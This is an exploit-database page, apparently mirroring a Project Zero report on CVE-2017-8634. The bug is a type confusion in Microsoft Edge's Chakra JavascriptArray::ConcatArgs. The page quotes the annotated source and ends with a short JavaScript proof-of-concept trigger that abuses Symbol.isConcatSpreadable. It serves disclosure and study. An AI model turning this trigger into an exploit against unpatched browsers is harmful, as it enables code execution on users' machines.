Vulners
Lucene search
Microsoft Edge Chakra JavascriptArray::ConcatArgs Type Confusion Exploit
| Reporter | Title | Published | Views | Family All 33 |
|---|---|---|---|---|
 | The vulnerability in the JavaScript kernel of Microsoft Edge allows a hacker to execute arbitrary code. | 25 Aug 201700:00 | – | bdu_fstec |
 | CVE-2017-8634 | 17 Aug 201700:00 | – | circl |
 | Microsoft Windows 10 Edge JavaScript Remote Code Execution Vulnerability (CNVD-2017-20506) | 9 Aug 201700:00 | – | cnvd |
 | Microsoft Edge Scripting Engine Memory Corruption (CVE-2017-8634) | 29 Aug 201700:00 | – | checkpoint_advisories |
 | CVE-2017-8634 | 8 Aug 201721:00 | – | cve |
 | CVE-2017-8634 | 8 Aug 201721:00 | – | cvelist |
 | August 8, 2017—KB4034674 (OS Build 15063.540) | 8 Aug 201707:00 | – | mskb |
 | KLA11084 Multiple vulnerabilities in Microsoft Edge and Microsoft Internet Explorer | 8 Aug 201700:00 | – | kaspersky |
 | Scripting Engine Memory Corruption Vulnerability | 8 Aug 201707:00 | – | mscve |
 | CVE-2017-8634 | 8 Aug 201721:29 | – | nvd |
10
Microsoft Edge: Chakra: Type confusion in JavascriptArray::ConcatArgs
CVE-2017-8634
Let's assume that the following method is called with "firstPromotedItemIsSpreadable = true", and "args" has two elements an array and an integer 0x1234 sequentially.
In the first loop, "aItem" is an array, and "firstPromotedItemIsSpreadable" remains true because the condition for the fast path is satisfied. In the second loop, "aItem" is 0x1234 and not spreadable, but the code at (a) makes the "spreadable" variable true, thus it reaches (b) and a type confusion occurs.
template<typename T>
void JavascriptArray::ConcatArgs(RecyclableObject* pDestObj, TypeId* remoteTypeIds,
Js::Arguments& args, ScriptContext* scriptContext, uint start, uint startIdxDest,
BOOL firstPromotedItemIsSpreadable, BigIndex firstPromotedItemLength, bool spreadableCheckedAndTrue)
{
JS_REENTRANCY_LOCK(jsReentLock, scriptContext->GetThreadContext());
JavascriptArray* pDestArray = nullptr;
if (JavascriptArray::Is(pDestObj))
{
pDestArray = JavascriptArray::FromVar(pDestObj);
}
T idxDest = startIdxDest;
for (uint idxArg = start; idxArg < args.Info.Count; idxArg++)
{
Var aItem = args[idxArg];
bool spreadable = spreadableCheckedAndTrue;
if (!spreadable && scriptContext->GetConfig()->IsES6IsConcatSpreadableEnabled())
{
// firstPromotedItemIsSpreadable is ONLY used to resume after a type promotion from uint32 to uint64
// we do this because calls to IsConcatSpreadable are observable (a big deal for proxies) and we don't
// want to do the work a second time as soon as we record the length we clear the flag.
JS_REENTRANT(jsReentLock, spreadable = firstPromotedItemIsSpreadable || JavascriptOperators::IsConcatSpreadable(aItem)); <<------------------------- (a)
if (!spreadable)
{
JS_REENTRANT(jsReentLock, JavascriptArray::SetConcatItem<T>(aItem, idxArg, pDestArray, pDestObj, idxDest, scriptContext));
++idxDest;
continue;
}
}
else
{
spreadableCheckedAndTrue = false; // if it was `true`, reset after the first use
}
if (pDestArray && JavascriptArray::IsDirectAccessArray(aItem) && JavascriptArray::IsDirectAccessArray(pDestArray)
&& BigIndex(idxDest + JavascriptArray::FromVar(aItem)->length).IsSmallIndex() && !JavascriptArray::FromVar(aItem)->IsFillFromPrototypes()) // Fast path
{
...
}
else
{
// Flatten if other array or remote array (marked with TypeIds_Array)
if (DynamicObject::IsAnyArray(aItem) || remoteTypeIds[idxArg] == TypeIds_Array || spreadable)
{
<<-------------------------------------------------------------------------------------------------- (b)
//CONSIDER: enumerating remote array instead of walking all indices
BigIndex length;
if (firstPromotedItemIsSpreadable)
{
firstPromotedItemIsSpreadable = false;
length = firstPromotedItemLength;
}
else
{
JS_REENTRANT(jsReentLock, length = OP_GetLength(aItem, scriptContext));
}
...
RecyclableObject* itemObject = RecyclableObject::FromVar(aItem); <<----------------------- TYPE CONFUSION
...
}
...
}
...
}
}
PoC:
let a = [0];
let b = [0];
b.__defineGetter__(Symbol.isConcatSpreadable, () => {
b[0] = 1.2;
return true;
});
let res = a.concat(b, 0x1234);
print(res);
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.
# 0day.today [2018-01-02] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 Aug 2017 00:00Current
7.8High risk
Vulners AI Score7.8
EPSS0.7437